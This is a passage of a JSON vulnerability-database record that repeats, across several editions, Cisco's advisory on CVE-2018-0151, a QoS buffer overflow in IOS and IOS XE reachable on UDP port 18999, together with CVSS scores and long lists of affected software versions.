link:\nhttps://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20180328-qos [\"https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20180328-qos\"]\nThis advisory is part of the March 28, 2018, release of the Cisco IOS and IOS XE Software Security Advisory Bundled Publication, which includes 20 Cisco Security Advisories that describe 22 vulnerabilities. For a complete list of the advisories and links to them, see Cisco Event Response: March 2018 Semiannual Cisco IOS and IOS XE Software Security Advisory Bundled Publication [\"https://tools.cisco.com/security/center/viewErp.x?alertId=ERP-66682\"].", "published": "2018-03-28T16:00:00", "modified": "2018-04-27T21:15:15", "cvss": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "cvss2": {"cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 10.0, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 10.0, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1"}, "exploitabilityScore": 3.9, "impactScore": 5.9}, "href": "https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20180328-qos", "reporter": "Cisco", "references": ["https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20180328-qos"], "cvelist": ["CVE-2018-0151"], "immutableFields": [], "lastseen": "2021-03-23T08:16:32", "history": [], "viewCount": 261, "enchantments": {"dependencies": {"modified": "2021-03-23T08:16:32", "references": [{"idList": ["CISCO-SA-20180328-QOS-IOS.NASL", "CISCO-SA-20180328-QOS-IOSXE.NASL"], "type": "nessus"}, {"idList": ["MYHACK58:62201889900"], "type": "myhack58"}, {"idList": ["ICSA-18-107-03"], "type": "ics"}, {"idList": ["CVE-2018-0151"], "type": "cve"}, {"idList": ["THREATPOST:B7DF4F28933004E3E4D52762786306C4"], "type": "threatpost"}, {"idList": ["CISCO-SA-20180328-QOS"], "type": "cisco"}], "rev": 2}, "score": {"modified": "2021-03-23T08:16:32", "rev": 2, "value": 8.5, "vector": "NONE"}}, "objectVersion": "1.5", "affectedSoftware": [{"version": "15.5S", "operator": "eq", "name": "ios"}, {"version": "15.5T", "operator": "eq", "name": "ios"}, {"version": "15.5M", "operator": "eq", "name": "ios"}, {"version": "15.5SN", "operator": "eq", "name": "ios"}, {"version": "15.6S", "operator": "eq", "name": "ios"}, {"version": "15.6T", "operator": "eq", "name": "ios"}, {"version": "15.6SP", "operator": "eq", "name": "ios"}, {"version": "15.6SN", "operator": "eq", "name": "ios"}, {"version": "15.6M", "operator": "eq", "name": "ios"}, {"version": "15.7M", "operator": "eq", "name": "ios"}, {"version": "3.14S", "operator": "eq", "name": "cisco ios xe software"}, {"version": "3.15S", "operator": "eq", "name": "cisco ios xe software"}, {"version": "3.16S", "operator": "eq", "name": "cisco ios xe software"}, {"version": "3.17S", "operator": "eq", "name": "cisco ios xe software"}, {"version": "16.1", "operator": "eq", "name": "cisco ios xe software"}, {"version": "16.2", "operator": "eq", "name": "cisco ios xe software"}, {"version": "16.3", "operator": "eq", "name": "cisco ios xe software"}, {"version": "16.4", "operator": "eq", "name": "cisco ios xe software"}, {"version": "16.5", "operator": "eq", "name": "cisco ios xe software"}, {"version": "3.18S", "operator": "eq", "name": "cisco ios xe software"}, {"version": "3.18SP", "operator": "eq", "name": "cisco ios xe software"}, {"version": "16.6", "operator": "eq", "name": "cisco ios xe software"}, {"version": "15.5(1)S", "operator": "eq", "name": "cisco ios"}, {"version": "15.5(2)S", "operator": "eq", "name": "cisco ios"}, {"version": "15.5(1)S1", "operator": "eq", "name": "cisco ios"}, {"version": "15.5(3)S", "operator": "eq", "name": "cisco ios"}, {"version": "15.5(1)S2", "operator": "eq", "name": "cisco ios"}, {"version": "15.5(1)S3", "operator": "eq", "name": "cisco ios"}, {"version": "15.5(2)S1", "operator": "eq", "name": "cisco ios"}, {"version": "15.5(2)S2", "operator": "eq", "name": "cisco ios"}, {"version": "15.5(3)S1", "operator": "eq", "name": "cisco ios"}, {"version": "15.5(3)S1a", "operator": "eq", "name": "cisco ios"}, {"version": "15.5(2)S3", "operator": "eq", "name": "cisco ios"}, {"version": "15.5(3)S2", "operator": "eq", "name": "cisco ios"}, {"version": "15.5(3)S0a", "operator": "eq", "name": "cisco ios"}, {"version": "15.5(3)S3", "operator": "eq", "name": "cisco ios"}, {"version": "15.5(1)S4", "operator": "eq", "name": "cisco ios"}, {"version": "15.5(2)S4", "operator": "eq", "name": "cisco ios"}, {"version": "15.5(3)S4", "operator": "eq", "name": "cisco ios"}, {"version": "15.5(3)S5", "operator": "eq", "name": "cisco ios"}, {"version": "15.5(3)S6", "operator": "eq", "name": "cisco ios"}, {"version": "15.5(3)S6a", "operator": "eq", "name": "cisco ios"}, {"version": "15.5(3)S6b", "operator": "eq", "name": "cisco ios"}, {"version": "15.5(1)T", "operator": "eq", "name": "cisco ios"}, {"version": "15.5(2)T", "operator": "eq", "name": "cisco ios"}, {"version": "15.5(1)T3", "operator": "eq", "name": "cisco ios"}, {"version": "15.5(2)T1", "operator": "eq", "name": "cisco ios"}, {"version": "15.5(2)T2", "operator": "eq", "name": "cisco ios"}, {"version": "15.5(2)T3", "operator": "eq", "name": "cisco ios"}, {"version": "15.5(2)T4", "operator": "eq", "name": "cisco ios"}, {"version": "15.5(1)T4", "operator": "eq", "name": "cisco ios"}, {"version": "15.5(3)M", "operator": "eq", "name": "cisco ios"}, {"version": "15.5(3)M1", "operator": "eq", "name": "cisco ios"}, {"version": "15.5(3)M0a", "operator": "eq", "name": "cisco ios"}, {"version": "15.5(3)M2", "operator": "eq", "name": "cisco ios"}, {"version": "15.5(3)M2a", "operator": "eq", "name": "cisco ios"}, {"version": "15.5(3)M3", "operator": "eq", "name": "cisco ios"}, {"version": "15.5(3)M4", "operator": "eq", "name": "cisco ios"}, {"version": "15.5(3)M4a", "operator": "eq", "name": "cisco ios"}, {"version": "15.5(3)M5", "operator": "eq", "name": "cisco ios"}, {"version": "15.5(3)M4b", "operator": "eq", "name": "cisco ios"}, {"version": "15.5(3)M4c", "operator": "eq", "name": "cisco ios"}, {"version": "15.5(3)M6", "operator": "eq", "name": "cisco ios"}, {"version": "15.5(3)M6a", "operator": "eq", "name": "cisco ios"}, {"version": "15.5(1)SN", "operator": "eq", "name": "cisco ios"}, {"version": "15.5(1)SN1", "operator": "eq", "name": "cisco ios"}, {"version": "15.5(2)SN", "operator": "eq", "name": "cisco ios"}, {"version": "15.5(3)SN0a", "operator": "eq", "name": "cisco ios"}, {"version": "15.5(3)SN", "operator": "eq", "name": "cisco ios"}, {"version": "15.6(1)S", "operator": "eq", "name": "cisco ios"}, {"version": "15.6(2)S", "operator": "eq", "name": "cisco ios"}, {"version": "15.6(2)S1", "operator": "eq", "name": "cisco ios"}, {"version": "15.6(1)S1", "operator": "eq", "name": "cisco ios"}, {"version": "15.6(1)S2", "operator": "eq", "name": "cisco ios"}, {"version": "15.6(2)S2", "operator": "eq", "name": "cisco ios"}, {"version": "15.6(1)S3", "operator": "eq", "name": "cisco ios"}, {"version": "15.6(2)S3", "operator": "eq", "name": "cisco ios"}, {"version": "15.6(1)S4", "operator": "eq", "name": "cisco ios"}, {"version": "15.6(2)S4", "operator": "eq", "name": "cisco ios"}, {"version": "15.6(1)T", "operator": "eq", "name": "cisco ios"}, {"version": "15.6(2)T", "operator": "eq", "name": "cisco ios"}, {"version": "15.6(1)T0a", "operator": "eq", "name": "cisco ios"}, {"version": "15.6(1)T1", "operator": "eq", "name": "cisco ios"}, {"version": "15.6(2)T1", "operator": "eq", "name": "cisco ios"}, {"version": "15.6(1)T2", "operator": "eq", "name": "cisco ios"}, {"version": "15.6(2)T0a", "operator": "eq", "name": "cisco ios"}, {"version": "15.6(2)T2", "operator": "eq", "name": "cisco ios"}, {"version": "15.6(1)T3", "operator": "eq", "name": "cisco ios"}, {"version": "15.6(2)T3", "operator": "eq", "name": "cisco ios"}, {"version": "15.6(2)SP", "operator": "eq", "name": "cisco ios"}, {"version": "15.6(2)SP1", "operator": "eq", "name": "cisco ios"}, {"version": "15.6(2)SP2", "operator": "eq", "name": "cisco ios"}, {"version": "15.6(2)SP3", "operator": "eq", "name": "cisco ios"}, {"version": "15.6(1)SN", "operator": "eq", "name": "cisco ios"}, {"version": "15.6(1)SN1", "operator": "eq", "name": "cisco ios"}, {"version": "15.6(2)SN", "operator": "eq", "name": "cisco ios"}, {"version": "15.6(1)SN2", "operator": "eq", "name": "cisco ios"}, {"version": "15.6(1)SN3", "operator": "eq", "name": "cisco ios"}, {"version": "15.6(3)SN", "operator": "eq", "name": "cisco ios"}, {"version": "15.6(4)SN", "operator": "eq", "name": "cisco ios"}, {"version": "15.6(5)SN", "operator": "eq", "name": "cisco ios"}, {"version": "15.6(6)SN", "operator": "eq", "name": "cisco ios"}, {"version": "15.6(7)SN", "operator": "eq", "name": "cisco ios"}, {"version": "15.6(7)SN1", "operator": "eq", "name": "cisco ios"}, {"version": "15.6(7)SN2", "operator": "eq", "name": "cisco ios"}, {"version": "15.6(7)SN3", "operator": "eq", "name": "cisco ios"}, {"version": "15.6(3)M", "operator": "eq", "name": "cisco ios"}, {"version": "15.6(3)M1", "operator": "eq", "name": "cisco ios"}, {"version": "15.6(3)M0a", "operator": "eq", "name": "cisco ios"}, {"version": "15.6(3)M1a", "operator": "eq", "name": "cisco ios"}, {"version": "15.6(3)M1b", "operator": "eq", "name": "cisco ios"}, {"version": "15.6(3)M2", "operator": "eq", "name": "cisco ios"}, {"version": "15.6(3)M2a", "operator": "eq", "name": "cisco ios"}, {"version": "15.6(3)M3", "operator": "eq", "name": "cisco ios"}, {"version": "15.6(3)M3a", "operator": "eq", "name": "cisco ios"}, {"version": "15.7(3)M", "operator": "eq", "name": "cisco ios"}, {"version": "15.7(3)M0a", "operator": "eq", "name": "cisco ios"}, {"version": "3.14.0S", "operator": "eq", "name": "cisco ios xe software"}, {"version": "3.14.1S", "operator": "eq", "name": "cisco ios xe software"}, {"version": "3.14.2S", "operator": "eq", "name": "cisco ios xe software"}, {"version": "3.14.3S", "operator": "eq", "name": "cisco ios xe software"}, {"version": "3.14.4S", "operator": "eq", "name": "cisco ios xe software"}, {"version": "3.15.0S", "operator": "eq", "name": "cisco ios xe software"}, {"version": "3.15.1S", "operator": "eq", "name": "cisco ios xe software"}, {"version": "3.15.2S", "operator": "eq", "name": "cisco ios xe software"}, {"version": "3.15.1cS", "operator": "eq", "name": "cisco ios xe software"}, {"version": "3.15.3S", "operator": "eq", "name": "cisco ios xe software"}, {"version": "3.15.4S", "operator": "eq", "name": "cisco ios xe software"}, {"version": "3.16.0S", "operator": "eq", "name": "cisco ios xe software"}, {"version": "3.16.1S", "operator": "eq", "name": "cisco ios xe software"}, {"version": "3.16.0aS", "operator": "eq", "name": "cisco ios xe software"}, {"version": "3.16.1aS", "operator": "eq", "name": "cisco ios xe software"}, {"version": "3.16.2S", "operator": "eq", "name": "cisco ios xe software"}, {"version": "3.16.2aS", "operator": "eq", "name": "cisco ios xe software"}, {"version": "3.16.0bS", "operator": "eq", "name": "cisco ios xe software"}, {"version": "3.16.0cS", "operator": "eq", "name": "cisco ios xe software"}, {"version": "3.16.3S", "operator": "eq", "name": "cisco ios xe software"}, {"version": "3.16.2bS", "operator": "eq", "name": "cisco ios xe software"}, {"version": "3.16.3aS", "operator": "eq", "name": "cisco ios xe software"}, {"version": "3.16.4S", "operator": "eq", "name": "cisco ios xe software"}, {"version": "3.16.4aS", "operator": "eq", "name": "cisco ios xe software"}, {"version": "3.16.4bS", "operator": "eq", "name": "cisco ios xe software"}, {"version": "3.16.4gS", "operator": "eq", "name": "cisco ios xe software"}, {"version": "3.16.5S", "operator": "eq", "name": "cisco ios xe software"}, {"version": "3.16.4cS", "operator": "eq", "name": "cisco ios xe software"}, {"version": "3.16.4dS", "operator": "eq", "name": "cisco ios xe software"}, {"version": "3.16.4eS", "operator": "eq", "name": "cisco ios xe software"}, {"version": "3.16.6S", "operator": "eq", "name": "cisco ios xe software"}, {"version": "3.16.5aS", "operator": "eq", "name": "cisco ios xe software"}, {"version": "3.16.5bS", "operator": "eq", "name": "cisco ios xe software"}, {"version": "3.16.6bS", "operator": "eq", "name": "cisco ios xe software"}, {"version": "3.17.0S", "operator": "eq", "name": "cisco ios xe software"}, {"version": "3.17.1S", "operator": "eq", "name": "cisco ios xe software"}, {"version": "3.17.2S", "operator": "eq", "name": "cisco ios xe software"}, {"version": "3.17.1aS", "operator": "eq", "name": "cisco ios xe software"}, {"version": "3.17.3S", "operator": "eq", "name": "cisco ios xe software"}, {"version": "3.17.4S", "operator": "eq", "name": "cisco ios xe software"}, {"version": "16.1.1", "operator": "eq", "name": "cisco ios xe software"}, {"version": "16.1.2", "operator": "eq", "name": "cisco ios xe software"}, {"version": "16.1.3", "operator": "eq", "name": "cisco ios xe software"}, {"version": "16.2.1", "operator": "eq", "name": "cisco ios xe software"}, {"version": "16.2.2", "operator": "eq", "name": "cisco ios xe software"}, {"version": "16.3.1", "operator": "eq", "name": "cisco ios xe software"}, {"version": "16.3.2", "operator": "eq", "name": "cisco ios xe software"}, {"version": "16.3.3", "operator": "eq", "name": "cisco ios xe software"}, {"version": "16.3.1a", "operator": "eq", "name": "cisco ios xe software"}, {"version": "16.3.4", "operator": "eq", "name": "cisco ios xe software"}, {"version": "16.3.5", "operator": "eq", "name": "cisco ios xe software"}, {"version": "16.3.5b", "operator": "eq", "name": "cisco ios xe software"}, {"version": "16.4.1", "operator": "eq", "name": "cisco ios xe software"}, {"version": "16.4.2", "operator": "eq", "name": "cisco ios xe software"}, {"version": "16.5.1", "operator": "eq", "name": "cisco ios xe software"}, {"version": "16.5.1a", "operator": "eq", "name": "cisco ios xe software"}, {"version": "16.5.1b", "operator": "eq", "name": "cisco ios xe software"}, {"version": "16.5.2", "operator": "eq", "name": "cisco ios xe software"}, {"version": "3.18.0aS", "operator": "eq", "name": "cisco ios xe software"}, {"version": "3.18.0S", "operator": "eq", "name": "cisco ios xe software"}, {"version": "3.18.1S", "operator": "eq", "name": "cisco ios xe software"}, {"version": "3.18.2S", "operator": "eq", "name": "cisco ios xe software"}, {"version": "3.18.3S", "operator": "eq", "name": "cisco ios xe software"}, {"version": "3.18.4S", "operator": "eq", "name": "cisco ios xe software"}, {"version": "3.18.0SP", "operator": "eq", "name": "cisco ios xe software"}, {"version": "3.18.1SP", "operator": "eq", "name": "cisco ios xe software"}, {"version": "3.18.1aSP", "operator": "eq", "name": "cisco ios xe software"}, {"version": "3.18.1gSP", "operator": "eq", "name": "cisco ios xe software"}, {"version": "3.18.1bSP", "operator": "eq", "name": "cisco ios xe software"}, {"version": "3.18.1cSP", "operator": "eq", "name": "cisco ios xe software"}, {"version": "3.18.2SP", "operator": "eq", "name": "cisco ios xe software"}, {"version": "3.18.1hSP", "operator": "eq", "name": "cisco ios xe software"}, {"version": "3.18.2aSP", "operator": "eq", "name": "cisco ios xe software"}, {"version": "3.18.1iSP", "operator": "eq", "name": "cisco ios xe software"}, {"version": "3.18.3SP", "operator": "eq", "name": "cisco ios xe software"}, {"version": "3.18.3aSP", "operator": "eq", "name": "cisco ios xe software"}, {"version": "16.6.1", "operator": "eq", "name": "cisco ios xe software"}], "vendorCvss": {}}, "lastseen": "2021-03-23T08:16:32", "differentElements": ["affectedSoftware", "cvss2", "cvss3"], "edition": 5}, {"bulletin": {"id": "CISCO-SA-20180328-QOS", "hash": "f4359c51a870cd74c759bb8fd3b9f3b560fed8e00c6fc89ed030de2ea9888082", "type": "cisco", "bulletinFamily": "software", "title": "Cisco IOS and IOS XE Software Quality of Service Remote Code Execution Vulnerability", "description": "A vulnerability in the quality of service (QoS) subsystem of Cisco IOS Software and Cisco IOS XE Software could allow an unauthenticated, remote attacker to cause a denial of service (DoS) condition or execute arbitrary code with elevated privileges.\n\nThe vulnerability is due to incorrect bounds checking of certain values in packets that are destined for UDP port 18999 of an affected device. An attacker could exploit this vulnerability by sending malicious packets to an affected device. When the packets are processed, an exploitable buffer overflow condition may occur. A successful exploit could allow the attacker to execute arbitrary code on the affected device with elevated privileges. The attacker could also leverage this vulnerability to cause the device to reload, causing a temporary DoS condition while the device is reloading.\n\nThe malicious packets must be destined to and processed by an affected device. Traffic transiting a device will not trigger the vulnerability.\n\nCisco has released software updates that address this vulnerability. There are workarounds for most affected Cisco products that address this vulnerability.\n\nThis advisory is available at the following link:\nhttps://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20180328-qos [\"https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20180328-qos\"]\nThis advisory is part of the March 28, 2018, release of the Cisco IOS and IOS XE Software Security Advisory Bundled Publication, which includes 20 Cisco Security Advisories that describe 22 vulnerabilities. For a complete list of the advisories and links to them, see Cisco Event Response: March 2018 Semiannual Cisco IOS and IOS XE Software Security Advisory Bundled Publication [\"https://tools.cisco.com/security/center/viewErp.x?alertId=ERP-66682\"].", "published": "2018-03-28T16:00:00", "modified": "2018-04-27T21:15:15", "cvss": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "cvss2": {}, "cvss3": {}, "href": "https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20180328-qos", "reporter": "Cisco", "references": ["https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20180328-qos"], "cvelist": ["CVE-2018-0151"], "immutableFields": [], "lastseen": "2021-03-23T08:16:32", "history": [], "viewCount": 261, "enchantments": {"dependencies": {"modified": "2021-03-23T08:16:32", "references": [{"idList": ["CISCO-SA-20180328-QOS-IOS.NASL", "CISCO-SA-20180328-QOS-IOSXE.NASL"], "type": "nessus"}, {"idList": ["MYHACK58:62201889900"], "type": "myhack58"}, {"idList": ["ICSA-18-107-03"], "type": "ics"}, {"idList": ["CVE-2018-0151"], "type": "cve"}, {"idList": ["THREATPOST:B7DF4F28933004E3E4D52762786306C4"], "type": "threatpost"}, {"idList": ["CISCO-SA-20180328-QOS"], "type": "cisco"}], "rev": 2}, "score": {"modified": "2021-03-23T08:16:32", "rev": 2, "value": 8.5, "vector": "NONE"}}, "objectVersion": "1.5", "affectedSoftware": [], "vendorCvss": {}}, "lastseen": "2021-03-23T08:16:32", "differentElements": ["affectedSoftware"], "edition": 6}, {"bulletin": {"id": "CISCO-SA-20180328-QOS", "hash": "5a45933d8440e6849d1a6225d5215055", "type": "cisco", "bulletinFamily": "software", "title": "Cisco IOS and IOS XE Software Quality of Service Remote Code Execution Vulnerability", "description": "A vulnerability in the quality of service (QoS) subsystem of Cisco IOS Software and Cisco IOS XE Software could allow an unauthenticated, remote attacker to cause a denial of service (DoS) condition or execute arbitrary code with elevated privileges.\n\nThe vulnerability is due to incorrect bounds checking of certain values in packets that are destined for UDP port 18999 of an affected device. An attacker could exploit this vulnerability by sending malicious packets to an affected device. When the packets are processed, an exploitable buffer overflow condition may occur. A successful exploit could allow the attacker to execute arbitrary code on the affected device with elevated privileges. The attacker could also leverage this vulnerability to cause the device to reload, causing a temporary DoS condition while the device is reloading.\n\nThe malicious packets must be destined to and processed by an affected device. Traffic transiting a device will not trigger the vulnerability.\n\nCisco has released software updates that address this vulnerability. There are workarounds for most affected Cisco products that address this vulnerability.\n\nThis advisory is available at the following link:\nhttps://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20180328-qos [\"https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20180328-qos\"]\nThis advisory is part of the March 28, 2018, release of the Cisco IOS and IOS XE Software Security Advisory Bundled Publication, which includes 20 Cisco Security Advisories that describe 22 vulnerabilities. For a complete list of the advisories and links to them, see Cisco Event Response: March 2018 Semiannual Cisco IOS and IOS XE Software Security Advisory Bundled Publication [\"https://tools.cisco.com/security/center/viewErp.x?alertId=ERP-66682\"].", "published": "2018-03-28T16:00:00", "modified": "2018-04-27T21:15:15", "cvss": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "cvss2": {}, "cvss3": {}, "href": "https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20180328-qos", "reporter": "Cisco", "references": ["https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20180328-qos"], "cvelist": ["CVE-2018-0151"], "immutableFields": [], "lastseen": "2021-07-28T16:27:25", "history": [], "viewCount": 261, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2018-0151"]}, {"type": "nessus", "idList": ["CISCO-SA-20180328-QOS-IOS.NASL", "720296.PRM", "CISCO-SA-20180328-QOS-IOSXE.NASL"]}, {"type": "myhack58", "idList": ["MYHACK58:62201889900"]}, {"type": "threatpost", "idList": ["THREATPOST:B7DF4F28933004E3E4D52762786306C4"]}, {"type": "ics", "idList": ["ICSA-18-107-03"]}, {"type": "cisco", "idList": ["CISCO-SA-20180328-QOS"]}], "modified": "2021-07-28T16:27:25", "rev": 2}, "score": {"value": 8.5, "vector": "NONE", "modified": "2021-07-28T16:27:25", "rev": 2}}, "objectVersion": "1.6", "affectedSoftware": [{"version": "15.5S", "operator": "eq", "name": "ios"}, {"version": "15.5T", "operator": "eq", "name": "ios"}, {"version": "15.5M", "operator": "eq", "name": "ios"}, {"version": "15.5SN", "operator": "eq", "name": "ios"}, {"version": "15.6S", "operator": "eq", "name": "ios"}, {"version": "15.6T", "operator": "eq", "name": "ios"}, {"version": "15.6SP", "operator": "eq", "name": "ios"}, {"version": "15.6SN", "operator": "eq", "name": "ios"}, {"version": "15.6M", "operator": "eq", "name": "ios"}, {"version": "15.7M", "operator": "eq", "name": "ios"}, {"version": "3.14S", "operator": "eq", "name": "cisco ios xe software"}, {"version": "3.15S", "operator": "eq", "name": "cisco ios xe software"}, {"version": "3.16S", "operator": "eq", "name": "cisco ios xe software"}, {"version": "3.17S", "operator": "eq", "name": "cisco ios xe software"}, {"version": "16.1", "operator": "eq", "name": "cisco ios xe software"}, {"version": "16.2", "operator": "eq", "name": "cisco ios xe software"}, {"version": "16.3", "operator": "eq", "name": "cisco ios xe software"}, {"version": "16.4", "operator": "eq", "name": "cisco ios xe software"}, {"version": "16.5", "operator": "eq", "name": "cisco ios xe software"}, {"version": "3.18S", "operator": "eq", "name": "cisco ios xe software"}, {"version": "3.18SP", "operator": "eq", "name": "cisco ios xe software"}, {"version": "16.6", "operator": "eq", "name": "cisco ios xe software"}, {"version": "15.5(1)S", "operator": "eq", "name": "cisco ios"}, {"version": "15.5(2)S", "operator": "eq", "name": "cisco ios"}, {"version": "15.5(1)S1", "operator": "eq", "name": "cisco ios"}, {"version": "15.5(3)S", "operator": "eq", "name": "cisco ios"}, {"version": "15.5(1)S2", "operator": "eq", "name": "cisco ios"}, {"version": "15.5(1)S3", "operator": "eq", "name": "cisco ios"}, {"version": "15.5(2)S1", "operator": "eq", "name": "cisco ios"}, {"version": "15.5(2)S2", "operator": "eq", "name": "cisco ios"}, {"version": "15.5(3)S1", "operator": "eq", "name": "cisco ios"}, {"version": "15.5(3)S1a", "operator": "eq", "name": "cisco ios"}, {"version": "15.5(2)S3", "operator": "eq", "name": "cisco ios"}, {"version": "15.5(3)S2", "operator": "eq", "name": "cisco ios"}, {"version": "15.5(3)S0a", "operator": "eq", "name": "cisco ios"}, {"version": "15.5(3)S3", "operator": "eq", "name": "cisco ios"}, {"version": "15.5(1)S4", "operator": "eq", "name": "cisco ios"}, {"version": "15.5(2)S4", "operator": "eq", "name": "cisco ios"}, {"version": "15.5(3)S4", "operator": "eq", "name": "cisco ios"}, {"version": "15.5(3)S5", "operator": "eq", "name": "cisco ios"}, {"version": "15.5(3)S6", "operator": "eq", "name": "cisco ios"}, {"version": "15.5(3)S6a", "operator": "eq", "name": "cisco ios"}, {"version": "15.5(3)S6b", "operator": "eq", "name": "cisco ios"}, {"version": "15.5(1)T", "operator": "eq", "name": "cisco ios"}, {"version": "15.5(2)T", "operator": "eq", "name": "cisco ios"}, {"version": "15.5(1)T3", "operator": "eq", "name": "cisco ios"}, {"version": "15.5(2)T1", "operator": "eq", "name": "cisco ios"}, {"version": "15.5(2)T2", "operator": "eq", "name": "cisco ios"}, {"version": "15.5(2)T3", "operator": "eq", "name": "cisco ios"}, {"version": "15.5(2)T4", "operator": "eq", "name": "cisco ios"}, {"version": "15.5(1)T4", "operator": "eq", "name": "cisco ios"}, {"version": "15.5(3)M", "operator": "eq", "name": "cisco ios"}, {"version": "15.5(3)M1", "operator": "eq", "name": "cisco ios"}, {"version": "15.5(3)M0a", "operator": "eq", "name": "cisco ios"}, {"version": "15.5(3)M2", "operator": "eq", "name": "cisco ios"}, {"version": "15.5(3)M2a", "operator": "eq", "name": "cisco ios"}, {"version": "15.5(3)M3", "operator": "eq", "name": "cisco ios"}, {"version": "15.5(3)M4", "operator": "eq", "name": "cisco ios"}, {"version": "15.5(3)M4a", "operator": "eq", "name": "cisco ios"}, {"version": "15.5(3)M5", "operator": "eq", "name": "cisco ios"}, {"version": "15.5(3)M4b", "operator": "eq", "name": "cisco ios"}, {"version": "15.5(3)M4c", "operator": "eq", "name": "cisco ios"}, {"version": "15.5(3)M6", "operator": "eq", "name": "cisco ios"}, {"version": "15.5(3)M6a", "operator": "eq", "name": "cisco ios"}, {"version": "15.5(1)SN", "operator": "eq", "name": "cisco ios"}, {"version": "15.5(1)SN1", "operator": "eq", "name": "cisco ios"}, {"version": "15.5(2)SN", "operator": "eq", "name": "cisco ios"}, {"version": "15.5(3)SN0a", "operator": "eq", "name": "cisco ios"}, {"version": "15.5(3)SN", "operator": "eq", "name": "cisco ios"}, {"version": "15.6(1)S", "operator": "eq", "name": "cisco ios"}, {"version": "15.6(2)S", "operator": "eq", "name": "cisco ios"}, {"version": "15.6(2)S1", "operator": "eq", "name": "cisco ios"}, {"version": "15.6(1)S1", "operator": "eq", "name": "cisco ios"}, {"version": "15.6(1)S2", "operator": "eq", "name": "cisco ios"}, {"version": "15.6(2)S2", "operator": "eq", "name": "cisco ios"}, {"version": "15.6(1)S3", "operator": "eq", "name": "cisco ios"}, {"version": "15.6(2)S3", "operator": "eq", "name": "cisco ios"}, {"version": "15.6(1)S4", "operator": "eq", "name": "cisco ios"}, {"version": "15.6(2)S4", "operator": "eq", "name": "cisco ios"}, {"version": "15.6(1)T", "operator": "eq", "name": "cisco ios"}, {"version": "15.6(2)T", "operator": "eq", "name": "cisco ios"}, {"version": "15.6(1)T0a", "operator": "eq", "name": "cisco ios"}, {"version": "15.6(1)T1", "operator": "eq", "name": "cisco ios"}, {"version": "15.6(2)T1", "operator": "eq", "name": "cisco ios"}, {"version": "15.6(1)T2", "operator": "eq", "name": "cisco ios"}, {"version": "15.6(2)T0a", "operator": "eq", "name": "cisco ios"}, {"version": "15.6(2)T2", "operator": "eq", "name": "cisco ios"}, {"version": "15.6(1)T3", "operator": "eq", "name": "cisco ios"}, {"version": "15.6(2)T3", "operator": "eq", "name": "cisco ios"}, {"version": "15.6(2)SP", "operator": "eq", "name": "cisco ios"}, {"version": "15.6(2)SP1", "operator": "eq", "name": "cisco ios"}, {"version": "15.6(2)SP2", "operator": "eq", "name": "cisco ios"}, {"version": "15.6(2)SP3", "operator": "eq", "name": "cisco ios"}, {"version": "15.6(1)SN", "operator": "eq", "name": "cisco ios"}, {"version": "15.6(1)SN1", "operator": "eq", "name": "cisco ios"}, {"version": "15.6(2)SN", "operator": "eq", "name": "cisco ios"}, {"version": "15.6(1)SN2", "operator": "eq", "name": "cisco ios"}, {"version": "15.6(1)SN3", "operator": "eq", "name": "cisco ios"}, {"version": "15.6(3)SN", "operator": "eq", "name": "cisco ios"}, {"version": "15.6(4)SN", "operator": "eq", "name": "cisco ios"}, {"version": "15.6(5)SN", "operator": "eq", "name": "cisco ios"}, {"version": "15.6(6)SN", "operator": "eq", "name": "cisco ios"}, {"version": "15.6(7)SN", "operator": "eq", "name": "cisco ios"}, {"version": "15.6(7)SN1", "operator": "eq", "name": "cisco ios"}, {"version": "15.6(7)SN2", "operator": "eq", "name": "cisco ios"}, {"version": "15.6(7)SN3", "operator": "eq", "name": "cisco ios"}, {"version": "15.6(3)M", "operator": "eq", "name": "cisco ios"}, {"version": "15.6(3)M1", "operator": "eq", "name": "cisco ios"}, {"version": "15.6(3)M0a", "operator": "eq", "name": "cisco ios"}, {"version": "15.6(3)M1a", "operator": "eq", "name": "cisco ios"}, {"version": "15.6(3)M1b", "operator": "eq", "name": "cisco ios"}, {"version": "15.6(3)M2", "operator": "eq", "name": "cisco ios"}, {"version": "15.6(3)M2a", "operator": "eq", "name": "cisco ios"}, {"version": "15.6(3)M3", "operator": "eq", "name": "cisco ios"}, {"version": "15.6(3)M3a", "operator": "eq", "name": "cisco ios"}, {"version": "15.7(3)M", "operator": "eq", "name": "cisco ios"}, {"version": "15.7(3)M0a", "operator": "eq", "name": "cisco ios"}, {"version": "3.14.0S", "operator": "eq", "name": "cisco ios xe software"}, {"version": "3.14.1S", "operator": "eq", "name": 